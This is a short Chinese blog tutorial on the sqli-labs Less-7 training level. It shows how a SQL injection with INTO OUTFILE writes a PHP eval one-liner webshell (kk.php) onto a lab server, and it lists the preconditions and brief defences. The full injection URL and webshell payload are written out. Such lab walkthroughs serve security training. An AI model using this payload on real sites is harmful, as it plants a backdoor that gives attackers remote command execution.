利用注入写Webshell(sql-lab第七关)

本文介绍如何通过SQL注入利用outfile语法来实现文件写入,包括PHP一句话木马的植入过程,并提出了相应的防御措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

结合PHP一句话木马

利用outfile生成文件

利用条件
1、文件具有写的条件
2、知道绝对路径

以sql-lab第七关为例

http://192.168.3.10/sqli/Less-7/?id=1——》
在这里插入图片描述
http://192.168.3.10/sqli/Less-7/?id=1’ union select xxx into outfile ‘绝对路径’ --+

——》http://192.168.3.10/sqli/Less-7/?id=1’ union select 1,2,’<?php eval($_POST["cmd"]);?>’ into outfile ‘D:\phpStudy\PHPTutorial\WWW\sqli\Less-7\kk.php’
在这里插入图片描述
在这里插入图片描述
查看一下生成的kk.php

防御:
不开启写条件
过滤
PDO

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值